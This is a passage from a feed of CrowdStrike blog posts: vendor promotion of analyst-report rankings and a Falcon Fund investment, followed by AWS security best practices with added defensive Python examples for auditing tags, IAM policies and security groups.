In the report, CrowdStrike was positioned furthest to the right and highest in Innovation, demonstrating our commitment to delivering cutting-edge technology. “CrowdStrike is a cyber industry force, and its Falcon Identity Protection demonstrates real attention to detail where threats are related,” KuppingerCole states.

The cloud-native architecture of Falcon Identity Protection is another point of differentiation, delivering the speed and scale that businesses need, with minimal hardware requirements.

“Offered as a cloud-native SaaS service, Falcon Identity Protection component requires a minimal on-premises footprint, requiring only a lightweight Falcon sensor on the Active Directory (AD) domain controllers. This architecture also enables packet-level inspection and real-time alerting of suspicious events,” states the report.

CrowdStrike Focuses Where Threats Are

In our mission to stop breaches, CrowdStrike focuses where identity threats often originate: in Microsoft identity environments. This is reflected in the report, with KuppingerCole describing Microsoft environments as “the entry point to attack vectors.”

“Falcon Identity Protection excels at its deep coverage of Microsoft environments, including on-premises AD and Azure-based environments. The coverage ranges from aging AD protocols for domain controller replication, to password hash synchronization over AD Connect, to Azure based attacks on Entra ID,” states the report.

CrowdStrike’s protection of Microsoft identity stores extends into specific product features and services that KuppingerCole also highlighted in its report.

“Given CrowdStrike’s long history in InfoSec and SOC practices, Falcon Identity Protection offers unique features to help bridge identity administration performed by IT and identity security. It does this by providing guidance to InfoSec personnel who may not have deep knowledge of AD and Entra ID.”

With these features and our continuing emphasis on stopping identity-based attacks on Microsoft environments, KuppingerCole said CrowdStrike delivers “very strong protection for Microsoft environments” in its report.

Delivered from the Unified Falcon Platform

CrowdStrike firmly believes ITDR is a problem that cannot be addressed in isolation by point products. Of all of the vendors evaluated in the report, CrowdStrike is the only one that delivers identity security as a capability tightly integrated into a unified platform.

Our innovative approach of combining endpoint and identity protection into the AI-native CrowdStrike Falcon® platform with a single agent, powered with threat intel and adversary tradecraft, is key to stopping identity breaches in real time. The unified approach is shown to accelerate response time with projections calculating up to 85% faster detection of identity attacks and lower total cost of ownership, delivering up to $2 million USD in savings over three years.

Another CrowdStrike advantage is our extensive partner network that delivers industry-leading capabilities such as real-time response as part of Falcon Identity Protection.

“The company’s API ecosystem offers REST and GraphQL APIs for most of its functionalities, including real-time response to identity threats. This approach not only offers compliance with current tech standards but also portrays CrowdStrike’s forward-thinking strategy, promising near-term enhancements to further open up their platform.”

The Future of Identity Security

With this report, CrowdStrike is the proven leader in identity threat protection, paralleling our industry leadership in endpoint security, cloud security, managed detection and response, threat intelligence and risk-based vulnerability management.

Thanks to all of the CrowdStrike customers that use our platform every day to stop breaches. We’re committed to delivering the best technology and services on the market for you!

Additional Resources

CrowdStrike Named a Leader in IDC MarketScape for Worldwide MDR

29 April 2024 at 18:31

The #1 global managed detection and response (MDR) provider and pioneer continues to dominate. Today, CrowdStrike was named a Leader in the 2024 IDC MarketScape: Worldwide Managed Detection and Response 2024 Vendor Assessment [1] among the 19 vendors evaluated in the report.

CrowdStrike was also recently named a Leader in Frost & Sullivan’s 2024 Frost Radar: Managed Detection and Response.

The global demand for MDR continues to surge as businesses face a harsh reality: While many struggle to recruit the cybersecurity talent they need, adversaries are getting faster and stealthier. To stay ahead of emerging threats, organizations must operate at maximum efficiency and employ the right blend of skills, processes and cutting-edge technology. 

CrowdStrike Falcon® Complete delivers 24/7 managed detection and response, powered by the AI-native CrowdStrike Falcon® XDR platform. Operating as a seamless extension of customers’ teams, Falcon Complete combines advanced threat detection, investigation and response with industry-leading threat intelligence and threat hunting to accelerate mean-time-to-respond (MTTR), narrow the cybersecurity skills gap and thwart even the most sophisticated attacks.

As a pioneer in MDR, the emerging cloud detection and response (CDR) category and adversary intelligence, CrowdStrike is consistently recognized by customers, analysts and third-party awards programs for its industry-leading MDR offering. 

IDC MarketScape: CrowdStrike a Leader in WW MDR

CrowdStrike has been named a Leader in the 2024 IDC MarketScape for worldwide MDR report. CrowdStrike was also named a Leader in the IDC MarketScape: U.S. Managed Detection Response Services 2021 Vendor Assessment. [2]

SOURCE: “IDC MarketScape: Worldwide Managed Detection and Response 2024 Vendor Assessment” by Craig Robinson, April 2024, IDC # US49006922.


IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of ICT suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market and business execution in the short-term. The Strategy score measures alignment of vendor strategies with customer requirements in a 3-5-year timeframe. Vendor market share is represented by the size of the circles. Vendor year-over-year growth rate relative to the given market is indicated by a plus, neutral or minus next to the vendor name.

The report noted…

“Falcon Complete offers a unique flat analyst operating model for MDR by eliminating analyst tiers and forming interchangeable “Fire Teams” — with each respective Fire Team capable of operating independently and delivering MDR services to customers 24×7. In this approach, every MDR security analyst is an experienced incident response expert capable of investigating and responding to any endpoint, cloud, identity, or multidomain threat they encounter. This model enables Falcon Complete to more efficiently and nimbly scale and balance resources across all Fire Teams while delivering positive security outcomes to every supported customer. The CrowdStrike Falcon platform and Falcon Complete MDR services are 100% cloud native and cloud delivered.”

Speed is a defining characteristic of Falcon Complete. With the fastest observed adversary breakout time down to just over two minutes in 2023, organizations are under immense pressure to quickly identify and stop attacks. 

“Falcon Complete’s multi-domain detection and response capabilities accelerate the time it takes to find and stop sophisticated, lateral-moving attacks.”

CrowdStrike’s elite security analysts and threat hunters deliver a seamless MDR service enriched with integrated threat intelligence and high-fidelity telemetry from the Falcon platform. This allows for faster and more effective detection and response to stop breaches. 

“IDC recognizes that there is a push ‘to the platform’ that is occurring in cybersecurity. This is worthy of mention as CrowdStrike has a wide depth and breadth of capabilities built into their Falcon platform that provides the technology muscle for their MDR offering.”

Frost & Sullivan: CrowdStrike Growth Leader in MDR

CrowdStrike was also named a Leader in the Frost Radar: Managed Detection and Response 2024. In the report, Frost & Sullivan named CrowdStrike the growth leader among 22 vendors evaluated and an “innovator and powerhouse” in the MDR sector.

“CrowdStrike delivers its services to companies of all sizes and across all industry verticals …. The company leverages its success in other security product and service domains, including endpoint security, cloud security, identity protection, XDR and more to power and cross-sell its MDR services while offering complimentary services that provide additional value for customers looking to address specific use cases.”

Our continued growth in MDR is accelerated by Falcon Complete for Service Providers, which allows service providers to enhance their offerings and provide their customers the highest level of protection powered by our industry-leading MDR service.

“In September 2023, CrowdStrike launched Falcon Complete for Service Providers, which allows MSSPs and MSPs to license the company’s Falcon Complete MDR service, leveraging its expert team and technology to deliver 24/7 monitoring and security to their customers. This program is flexible, allowing service partners to co-brand, white-label and customize the services they provide to unlock significant growth potential.”

Ranking CrowdStrike high in innovation, Frost & Sullivan called Falcon Complete a “world-class security service” in the MDR sector, also stating:

“CrowdStrike leverages its impressive R&D budget and expert understanding of the challenges and trends in the security space to hold on to its position as an innovator and powerhouse in the MDR sector and in the cybersecurity industry as a whole.”

Frost & Sullivan also noted CrowdStrike’s technology advantage of delivering Falcon Complete from the unified Falcon platform. This approach allows us to extend our MDR capabilities across endpoints, identities, cloud workloads and third-party data to deliver end-to-end response and remediation across key attack surfaces.

“CrowdStrike recently expanded its MDR portfolio, extending its 24/7 managed detection and response service to incorporate trusted third-party telemetry, data sources, and automated response actions. These integrations are powered by more than 20 CrowdStrike alliance partners, including Cisco, Fortinet, Mimecast, Proofpoint and Zscaler.”

Gold Standard of MDR

As the pioneer of MDR, CrowdStrike remains the gold standard, delivering outcomes, not homework, for thousands of organizations worldwide. 

Falcon Complete received the highest detection coverage and was the only MDR to detect 99% of adversary techniques in the 2022 MITRE Engenuity ATT&CK® Evaluations for Managed Security Services. And our best-in-class CrowdStrike Breach Prevention Warranty gives customers additional peace of mind knowing we stand behind our claims.

Thank you to the IDC MarketScape and Frost & Sullivan for the recognition and to all of the hardworking CrowdStrikers for delivering the best MDR service on the market! 

Additional Resources


  1. Doc #US49006922, April 2024
  2. Doc #US48129921, August 2021

Falcon Fund in Focus: Nagomi Helps Customers Maximize Their Cybersecurity Investments

24 April 2024 at 14:51

Preventable breaches are a common problem. According to research by Nagomi, a leader in the nascent field of automated security control assessment, 80% of breached organizations already had a tool in place that could have prevented it. 

One solution is to maximize the use of security tools they already have. Many enterprises grapple with ineffective and reactive security operations, worsened by using multiple disparate security products. Tools are purchased but not fully deployed, ROI is never realized and teams are stuck in a constant state of reacting to alerts rather than making progress.

“I don’t need more tools … I need to find a way to deploy the tools I already have more effectively,” one CISO told Nagomi. “This is why I don’t sleep at night … I have no way of knowing my security stack’s effectiveness.”

Facing increasingly fast and stealthy threat actors, CISOs need to know their security investments are effective against evolving threats. This is where Nagomi adds tremendous value. And with support from the CrowdStrike Falcon Fund, they are changing the way security teams balance risk and defense.  

Falcon Fund Invests in Nagomi

Falcon Fund has invested in Nagomi to help organizations boost the effectiveness of their existing security tools. Falcon Fund, an investment fund managed by CrowdStrike in partnership with Accel, is focused on global, cross-stage investments in companies that provide differentiated capabilities to joint customers.

Nagomi, formerly known as Vena Security and founded in January 2023, offers a proactive defense platform that enables customers to better use their security stacks to defend against current and emerging threats in the wild. Nagomi transforms fragmented best-of-breed solutions into best-of-suite security for customers by providing end-to-end visibility of defense capabilities mapped against MITRE ATT&CK®. With this information, security teams can prioritize the most urgent risks based on their unique threat profile and get prescriptive remediation plans to reduce threat exposure.

Nagomi is quickly innovating to deliver a threat-centered, data-driven and actionable approach to cybersecurity — one that enables customers to provide high-level security maturity metrics to executives while showing security practitioners exactly how to reduce risk, fix misconfigurations and make strategic decisions with business context.

Nagomi’s early success proves the value of its proactive approach to security. Within six months of launching, Nagomi was successfully deployed by Fortune 500 customers and has seen significant adoption in some of the world’s most complex security environments. 

How the Integration Works

Nagomi helps CrowdStrike customers get the most from their CrowdStrike Falcon® deployment by monitoring for configuration gaps and testing for attacks across their IT infrastructure as well as other security tools. Nagomi’s proactive defense platform uses CrowdStrike’s modern cloud architecture to ingest detections, host details and policy settings to map the deployment of CrowdStrike Falcon sensors. Nagomi then tests adversary tactics, techniques and procedures (TTPs) against the mapped deployment to recommend configuration policy changes.

The integration provides CrowdStrike customers with:

  • Proactive risk management: Continuously analyze threats and corresponding defenses to identify gaps and remediation opportunities to prevent exploitation.
  • Actionable defense plans: Pinpoint risk and modify configuration settings based on vulnerability to adversary TTPs.
  • Clear communication: Share the current state of risk with peers and leadership using evidence-based data that considers business limitations and constraints.

Visit the CrowdStrike Marketplace to request the Nagomi integration and learn more.

Additional Resources

5 Best Practices to Secure AWS Resources

22 April 2024 at 17:03

Organizations are increasingly turning to cloud computing for IT agility, resilience and scalability. Amazon Web Services (AWS) stands at the forefront of this digital transformation, offering a robust, flexible and cost-effective platform that helps businesses drive growth and innovation. 

However, as organizations migrate to the cloud, they face a complex and growing threat landscape of sophisticated and cloud-conscious threat actors. Organizations with ambitious digital transformation strategies must be prepared to address these security challenges from Day One. The potential threat of compromise underscores the critical need to understand and implement security best practices tailored to the unique challenges of cloud environments. 

Central to understanding and navigating these challenges is the AWS shared responsibility model. AWS is responsible for delivering security of the cloud, including the security of underlying infrastructure and services. Customers are responsible for protecting their data, applications and resources running in the cloud. This model highlights the importance of proactive security measures at every phase of cloud migration and operation and helps ensure businesses maintain a strong security posture.

In this blog, we cover five best practices for securing AWS resources to help you gain a better understanding of how to protect your cloud environments as you build in the cloud. 

Best Practice #1: Know All of Your Assets

Cloud assets are not limited to compute instances (aka virtual machines) — they extend to all application workloads spanning compute, storage, networking and an extensive portfolio of managed services. 

Understanding and maintaining an accurate inventory of your AWS assets is foundational to securing your cloud environment. Given the dynamic nature of cloud computing, it’s not uncommon for organizations to inadvertently lose track of assets running in their AWS accounts, which can lead to risk exposure and attacks on unprotected resources. In some cases, accounts created early in an organization’s cloud journey may not have the standard security controls that were implemented later on. In another common scenario, teams may forget about and unintentionally remove mitigations put in place to address application-specific exceptions, exposing those resources to potential attack.

To maintain adequate insight and awareness of all AWS assets in production, organizations should consider implementing the following:

  • Conduct asset inventories: Use tools and processes that provide continuous visibility into all cloud assets. This can help maintain an inventory of public and private cloud resources and ensure all assets are accounted for and monitored. AWS Resource Explorer and Cost Explorer can help discover new resources as they’re provisioned.
  • Implement asset tagging and management policies: Establish and enforce policies for tagging cloud resources. This practice aids in organizing assets based on criticality, sensitivity and ownership, making it easier to manage and prioritize security efforts across the cloud environment. In combination with the AWS Identity and Access Management (IAM) service, tagging can also be used to dynamically grant access to resources via attribute-based access control (ABAC). 
  • Integrate security tools for holistic visibility: Combine the capabilities of cloud security posture management (CSPM) with other security tools like endpoint detection and response (EDR) solutions. Integration of these tools can provide a more comprehensive view of the security landscape, enabling quicker identification of misconfigurations, vulnerabilities and threats across all AWS assets. AWS services including Trusted Advisor, Security Hub, GuardDuty, Config and Inspector provide actionable insights to help security and operations teams improve their security posture.

CrowdStrike Falcon® Cloud Security makes it easy to implement these practices by offering a consolidated platform that integrates with AWS features to maintain coverage across a customer’s entire multi-account environment. Falcon Cloud Security offers CSPM, which leverages AWS EventBridge, IAM cross-account roles and CloudTrail API audit telemetry to provide continuous asset discovery, scan for misconfigurations and suspicious behavior, improve least-privilege controls and deploy runtime protection on EC2 and EKS clusters as they’re provisioned. It guides customers on how to secure their cloud environments to accelerate the learning of cloud security skills and the time-to-value for cloud initiatives. Cloud Operations teams can deploy AWS Security Hub with the CrowdStrike Falcon® Integration Gateway to view Falcon platform detections and trigger custom remediations inside AWS. AWS GuardDuty leverages CrowdStrike Falcon® Adversary Intelligence indicators of compromise and can provide an additional layer of visibility and protection for cloud teams.
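The tagging policy described under Best Practice #1 is only useful if it is enforced, so here is an added example (not code from CrowdStrike or AWS) that audits an asset inventory for missing or invalid tags and rolls the gaps up per account. The inventory is constructed, with hypothetical account IDs and ARNs, and is shaped like the resource list that AWS Resource Explorer returns from a search; that shape is an assumption of the example, and no AWS access or boto3 is needed to run it.

```python
"""Tag-compliance audit over an asset inventory (added example).

The sample inventory below is constructed and shaped like the ``Resources``
list in an AWS Resource Explorer search response (an assumption); boto3 and
AWS credentials are not required.
"""
from collections import defaultdict

# Tag policy: each required key maps to its allowed values
# (None means any non-empty value is acceptable).
REQUIRED_TAGS = {
    "Owner": None,
    "Environment": {"prod", "staging", "dev"},
    "DataClassification": {"public", "internal", "confidential"},
}

# Constructed inventory: hypothetical account ids, ARNs and tags.
SAMPLE_INVENTORY = [
    {"Arn": "arn:aws:ec2:us-east-1:111122223333:instance/i-0abc1",
     "ResourceType": "ec2:instance",
     "Properties": [{"Name": "tags", "Data": [
         {"Key": "Owner", "Value": "payments-team"},
         {"Key": "Environment", "Value": "prod"},
         {"Key": "DataClassification", "Value": "confidential"}]}]},
    {"Arn": "arn:aws:s3:::legacy-backup-bucket",
     "ResourceType": "s3:bucket",
     "Properties": [{"Name": "tags", "Data": [
         {"Key": "Environment", "Value": "production"}]}]},
    {"Arn": "arn:aws:rds:us-east-1:444455556666:db:analytics-db",
     "ResourceType": "rds:db",
     "Properties": []},
]


def tags_of(resource):
    """Flatten the 'tags' property of one resource into a {key: value} dict."""
    for prop in resource.get("Properties", []):
        if prop.get("Name") == "tags":
            return {t["Key"]: t["Value"] for t in prop.get("Data", [])}
    return {}


def account_of(arn):
    """Account id is the fifth colon-separated ARN field (empty for S3)."""
    parts = arn.split(":")
    return parts[4] or "<global>"


def audit_tags(inventory, policy=REQUIRED_TAGS):
    """Return findings as (arn, tag_key, problem) tuples."""
    findings = []
    for res in inventory:
        tags = tags_of(res)
        for key, allowed in policy.items():
            value = tags.get(key, "").strip()
            if not value:
                findings.append((res["Arn"], key, "missing"))
            elif allowed is not None and value not in allowed:
                findings.append((res["Arn"], key, f"invalid value {value!r}"))
    return findings


def summarize_by_account(findings):
    """Count findings per account, so neglected accounts stand out."""
    counts = defaultdict(int)
    for arn, _key, _problem in findings:
        counts[account_of(arn)] += 1
    return dict(counts)


if __name__ == "__main__":
    results = audit_tags(SAMPLE_INVENTORY)
    for arn, key, problem in results:
        print(f"{arn}: {key} {problem}")
    print(summarize_by_account(results))
```

Resources with no findings are the ones whose ownership and classification are known; everything else is a candidate for the "forgotten account" scenario the text describes. Feeding a real inventory in is a matter of replacing `SAMPLE_INVENTORY` with the pages returned by the inventory tool of choice.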

Best Practice #2: Enforce Multifactor Authentication (MFA) and Use Role-based Access Control in AWS

Stolen credentials pose a severe threat — whether they are user names and passwords or API key IDs and secrets — allowing adversaries to impersonate legitimate users and bypass identity-based access controls. This risk is exacerbated by scenarios where administrator credentials and hard-coded passwords are inadvertently stored in public-facing locations or within code repositories accessible online. Such exposures give attackers the opportunity to intercept live access keys, which they can use to authenticate to cloud services, posing as trusted users. 

In cloud environments, as well as on-premises, organizations should adopt identity security best practices such as avoiding use of shared credentials, assigning least-privilege access policies and using a single source of truth through identity provider federation and single sign-on (SSO). AWS services such as IAM, Identity Center and Organizations can facilitate secure access to AWS services by supporting the creation of granular access policies, enabling temporary session tokens, and reporting on cross-account trusts and excessively permissive policies, thus minimizing the likelihood and impact of access key exposure. By implementing MFA in conjunction with SSO, role-based access and temporary sessions, organizations make it much harder for attackers to steal credentials and, more importantly, to effectively use them.

Falcon Cloud Security includes cloud infrastructure entitlement management (CIEM), which evaluates whether IAM roles are overly permissive and provides the visibility to make changes with awareness of which resources will be impacted. Additionally, Falcon Cloud Security conducts pre-runtime scanning of container images and infrastructure-as-code (IaC) templates to uncover improperly elevated Kubernetes pod privileges and hard-coded credentials to prevent credential theft and lateral movement. Adding the CrowdStrike Falcon® Identity Protection module delivers strong protection for Active Directory environments, dynamically identifying administrator and service accounts and anomalous or malicious use of credentials, and allowing integration with workload detection and response actions. 
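To make the least-privilege and MFA advice in Best Practice #2 concrete, here is an added example (not CrowdStrike or AWS code) that statically reviews IAM policy documents: it flags `Allow` statements that grant `*` on `*`, service-wide wildcard actions, and sensitive actions reachable without the `aws:MultiFactorAuthPresent` condition. Both policies are constructed; the weak one is the kind of legacy admin policy the text warns about, the hardened one scopes the actions and adds the MFA condition. The list of "sensitive" action prefixes is an assumption chosen for illustration.

```python
"""Static review of IAM policy documents for least-privilege and MFA gaps.

Added example. The policies are constructed; only the IAM JSON policy
grammar is exercised, so no boto3 or AWS credentials are needed.
"""
import json

# Action prefixes treated as sensitive for this example (an assumption):
# identity changes, role assumption, org management and key management.
MFA_SENSITIVE_PREFIXES = ("iam:", "sts:AssumeRole", "organizations:", "kms:")


def _as_list(value):
    """The policy grammar allows a string or a list for Action/Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _mfa_required(statement):
    """True when the Condition block demands an MFA-backed session."""
    for operator, keys in statement.get("Condition", {}).items():
        for key, value in keys.items():
            if (key.lower() == "aws:multifactorauthpresent"
                    and operator.lower() == "bool"
                    and str(value).lower() == "true"):
                return True
    return False


def review_policy(policy):
    """Return human-readable findings for one policy document (a dict)."""
    findings = []
    for idx, st in enumerate(_as_list(policy.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = _as_list(st.get("Action"))
        resources = _as_list(st.get("Resource"))
        sid = st.get("Sid", f"statement[{idx}]")
        if "*" in actions and "*" in resources:
            findings.append(f"{sid}: full admin (Action '*' on Resource '*')")
        elif any(a == "*" or a.endswith(":*") for a in actions):
            findings.append(f"{sid}: service-wide wildcard action {actions}")
        if "*" in resources and "*" not in actions:
            findings.append(f"{sid}: actions scoped to every resource ('*')")
        sensitive = [a for a in actions
                     if a == "*" or a.startswith(MFA_SENSITIVE_PREFIXES)]
        if sensitive and not _mfa_required(st):
            findings.append(f"{sid}: {sensitive} allowed without MFA condition")
    return findings


# Constructed "before": a legacy admin policy with no MFA requirement.
WEAK_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "LegacyAdmin", "Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Sid": "ReadBucket", "Effect": "Allow",
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"}
  ]
}""")

# Constructed "after": scoped actions, MFA condition on the sensitive one
# (hypothetical account id and role name).
HARDENED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "ReadBucket", "Effect": "Allow",
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "AssumeDeployRoleWithMfa", "Effect": "Allow",
     "Action": "sts:AssumeRole",
     "Resource": "arn:aws:iam::111122223333:role/deploy",
     "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}}}
  ]
}""")


if __name__ == "__main__":
    for name, pol in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, review_policy(pol) or ["no findings"])
```

The check is deliberately syntactic: it reads the policy as written rather than simulating IAM's evaluation logic, so it is a cheap pre-commit gate for IaC repositories, not a replacement for IAM Access Analyzer or a CIEM product that understands effective permissions across roles and trust policies.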

Best Practice #3: Automatically Scan AWS Resources for Excessive Public Exposure

The inadvertent public exposure and misconfiguration of cloud resources such as EC2 instances, Relational Database Service (RDS) and containers on ECS and EKS through overly permissive network access policies pose a risk to the security of cloud workloads. Such lapses can accidentally open the door to unauthorized access to vulnerable services, providing attackers with opportunities to exploit weaknesses for data theft, launching further attacks and moving laterally within the cloud environment.

To mitigate these risks and enhance cloud security posture, organizations should:

  • Implement automated security audits: Use tools like AWS Trusted Advisor, AWS Config and AWS IAM Access Analyzer to continuously audit the configurations of AWS resources and to identify and remediate excessive public exposure or misconfigurations.
  • Secure AWS resources with proper security groups: Configure security groups for logical groups of AWS resources to restrict inbound and outbound traffic to only necessary and known IPs and ports. Whenever possible, also use network access control lists (NACLs) to restrict inbound and outbound access across entire VPC subnets, which helps prevent data exfiltration and block communication with potentially malicious external entities. Keep in mind that security groups are stateful (return traffic for an allowed connection is permitted automatically), whereas NACLs are stateless and need explicit rules in both directions, including the ephemeral port range used by responses. Services like AWS Firewall Manager provide a single pane of glass for configuring network access for all resources in an AWS account using VPC security groups, Web Application Firewall (WAF) and Network Firewall.
  • Collaborate across teams: Security teams should work closely with IT and DevOps to understand which external services are genuinely necessary and configure permissions accordingly, balancing operational needs with security requirements.
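
As an added example, not code from the original post or from CrowdStrike, the following Python audits security group rules for the kind of overly permissive ingress and egress described in the list above. It reads records in the shape of the EC2 DescribeSecurityGroups response, so the `SecurityGroups` array from `aws ec2 describe-security-groups` can be passed in unchanged. The sample groups, the sensitive-port list, the severity thresholds and the `audit_security_groups` function name are all assumptions made for this example.

```python
"""Audit EC2 security groups for internet-open ingress and unrestricted egress.

Input mirrors the EC2 DescribeSecurityGroups response (SecurityGroups[] with
IpPermissions / IpPermissionsEgress). SAMPLE_GROUPS below is constructed for
this example; the port list and severities are this example's own choices.
"""
from ipaddress import ip_network

# Services that should essentially never be reachable from the whole internet.
SENSITIVE_PORTS = {
    22: "SSH", 3389: "RDP", 1433: "MSSQL", 3306: "MySQL", 5432: "PostgreSQL",
    6379: "Redis", 9200: "Elasticsearch", 27017: "MongoDB", 2379: "etcd", 10250: "kubelet",
}


def _port_span(perm):
    """Port interval covered by one IpPermission; protocol -1 means every port."""
    if perm.get("IpProtocol") == "-1":
        return 0, 65535
    return perm.get("FromPort", 0), perm.get("ToPort", 65535)


def _cidrs(perm):
    """IPv4 and IPv6 CIDR sources of one rule (SG-to-SG references are skipped)."""
    return [r["CidrIp"] for r in perm.get("IpRanges", [])] + \
           [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]


def audit_security_groups(groups, max_public_prefix=8):
    """Return one finding per ingress rule whose source is the whole internet or a
    CIDR at least as broad as /max_public_prefix, plus one per fully open egress rule."""
    findings = []
    for sg in groups:
        for perm in sg.get("IpPermissions", []):
            low, high = _port_span(perm)
            for cidr in _cidrs(perm):
                net = ip_network(cidr, strict=False)
                if net.prefixlen > max_public_prefix:
                    continue  # scoped to a reasonably small source range
                world = net.prefixlen == 0
                hit = sorted(p for p in SENSITIVE_PORTS if low <= p <= high)
                severity = "HIGH" if world and hit else "MEDIUM" if world or hit else "LOW"
                findings.append({
                    "group": sg["GroupId"], "direction": "ingress", "source": cidr,
                    "ports": str(low) if low == high else f"{low}-{high}",
                    "services": [SENSITIVE_PORTS[p] for p in hit], "severity": severity,
                })
        for perm in sg.get("IpPermissionsEgress", []):
            # The default egress rule (all ports to 0.0.0.0/0) is what exfiltration rides on.
            if _port_span(perm) == (0, 65535) and any(
                    ip_network(c, strict=False).prefixlen == 0 for c in _cidrs(perm)):
                findings.append({"group": sg["GroupId"], "direction": "egress",
                                 "source": "any", "ports": "0-65535", "services": [],
                                 "severity": "LOW"})
    return findings


SAMPLE_GROUPS = [  # constructed for this example; not real account data
    {"GroupId": "sg-web",
     "IpPermissions": [{"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
                        "IpRanges": [{"CidrIp": "0.0.0.0/0"}],
                        "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}],
     "IpPermissionsEgress": [{"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]},
    {"GroupId": "sg-db",
     "IpPermissions": [{"IpProtocol": "tcp", "FromPort": 5432, "ToPort": 5432,
                        "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]},
    {"GroupId": "sg-bastion",
     "IpPermissions": [{"IpProtocol": "-1", "IpRanges": [{"CidrIp": "10.0.0.0/8"}]}]},
    {"GroupId": "sg-internal",
     "IpPermissions": [{"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
                        "IpRanges": [{"CidrIp": "10.20.0.0/16"}]}]},
]

if __name__ == "__main__":
    for f in audit_security_groups(SAMPLE_GROUPS):
        print(f"{f['severity']:6} {f['group']:12} {f['direction']:7} {f['source']:12} "
              f"ports {f['ports']} {' '.join(f['services'])}")
```

On the sample, `sg-db` (PostgreSQL from anywhere) is the only HIGH finding, `sg-web` on 443 is reported as MEDIUM for a human to confirm as intentional, the all-ports rule from `10.0.0.0/8` in `sg-bastion` is flagged as overly broad even though it is internal, and `sg-internal` produces nothing. A real audit would additionally cross-reference each group with the instances or ENIs that actually use it, since an open rule on an unattached group is noise.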

Falcon Cloud Security continuously monitors AWS service configurations for best practices, both in live environments and in pre-runtime IaC templates as part of a CI/CD or GitOps pipeline. Overly permissive network security policies are dynamically discovered and recorded as indicators of misconfiguration (IOMs), which are automatically correlated with all other security telemetry in the environment, along with insight into how the misconfiguration can be mitigated by the customer or maliciously used by the adversary.

Best Practice #4: Prioritize Alerts Based on Risk

Adversaries are becoming more skilled at attacking cloud environments, as evidenced by a 75% increase in cloud intrusions year-over-year in 2023. They are also getting faster: The average breakout time for eCrime operators to move laterally from one breached host to another was just 62 minutes in 2023. New technologies such as generative AI have the potential to lower the barrier to entry for less-skilled adversaries, making it easier to launch sophisticated attacks. Amid these evolving trends, effective alert management is paramount.

Cloud services are built to deliver a constant stream of API audit and service access logs, but sifting through all of this data can overwhelm security analysts and detract from their ability to focus on genuine threats. While some logs may indicate high-severity attacks that demand immediate response, most tend to be informational and often lack direct security implications. Generating alerts from this data can be imprecise, potentially resulting in many false positives, each of which requires SecOps investigation. Alert investigations consume precious time and scarce resources, leading to a situation where noisy security alerts prevent timely detection and effective response.

To navigate this complex landscape and enhance the effectiveness of cloud security operations, several best practices can be adopted to manage and prioritize alerts efficiently:

  • Prioritize alerts strategically: Develop a systematic approach to capture and prioritize high-fidelity alerts. Implementing a triage process based on the severity of events helps focus resources on the most critical investigations.
  • Create context around alerts: Enhance alert quality by enriching them with correlated data and context. This additional information increases confidence in the criticality of alerts, enabling more informed decision-making regarding their investigation.
  • Integrate and correlate telemetry sources: Improve confidence in prioritizing or deprioritizing alerts by incorporating details from other relevant data sources or security tools. This combination allows for a more comprehensive understanding of the security landscape, aiding in the accurate identification of genuine threats.
  • Outsource to a competent third party: For organizations overwhelmed by the volume of alerts, partnering with a managed detection and response (MDR) provider can be a viable solution. These partners can absorb the event burden, alleviating the bottleneck and allowing in-house teams to focus on strategic security initiatives.

AWS services like Amazon GuardDuty, which is powered in part by CrowdStrike Falcon Adversary Intelligence indicators of compromise (IOCs), help surface and alert on suspicious and malicious activity within AWS accounts, prioritizing indicators of attack (IOAs) and IOCs based on risk severity.

Falcon Cloud Security is a complete cloud security platform that unifies world-class threat intelligence and elite threat hunters. Falcon Cloud Security correlates telemetry and detections across IOMs, package vulnerabilities, suspicious behavior, adversary intelligence and third-party telemetry ingested through a library of data connectors to deliver a context-based risk assessment, which reduces false positives and automatically responds to stop breaches. 

Best Practice #5: Enable Comprehensive Logging

Adversaries that gain access to a compromised account can operate virtually undetected, limited only by the permissions granted to the account they used to break in. This stealthiness is compounded by the potential for log tampering and manipulation, where malicious actors may alter or delete log files to erase evidence of their activities. Such actions make it challenging to trace the adversary’s movements, evaluate the extent of data tampering or theft, and understand the full scope of the security incident. The lack of a comprehensive audit trail due to disabled or misconfigured logging mechanisms hinders the ability to maintain visibility over cloud operations, making it more difficult to detect and respond to threats.

In response, organizations can:

  • Enable comprehensive logging across the environment: Ensure AWS CloudTrail logs, S3 server access logs, Elastic Load Balancing (ELB) access logs, CloudFront logs and VPC flow logs are activated to maintain a detailed record of all activities and transactions.
  • Ingest and alert on logs in your SIEM: Integrate and analyze logs within your security information and event management (SIEM) system to enable real-time alerts on suspicious activities. Retain logs even if immediate analysis capabilities are lacking, as they may provide valuable insights in future investigations.
  • Ensure accuracy of logged data: For services behind proxies such as ELBs, make sure application logs record the original client IP from the X-Forwarded-For header rather than the load balancer's address. Note that this header is a comma-separated list to which each proxy appends the address it saw, and a client can send its own forged X-Forwarded-For value; only the entry appended by your own load balancer is trustworthy, so configure parsing to take that entry rather than the leftmost one.
  • Detect and prevent log tampering: Monitor for API calls that attempt to disable logging and for unexpected changes in cloud services or account settings that could undermine logging integrity, in line with the MITRE ATT&CK® technique Impair Defenses: Disable or Modify Cloud Logs (T1562.008). In addition, S3 MFA Delete adds protection for log buckets by requiring a valid MFA code to permanently delete an object version or to change the bucket's versioning state; it applies to versioning-enabled buckets and can be enabled only with the account's root credentials.
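
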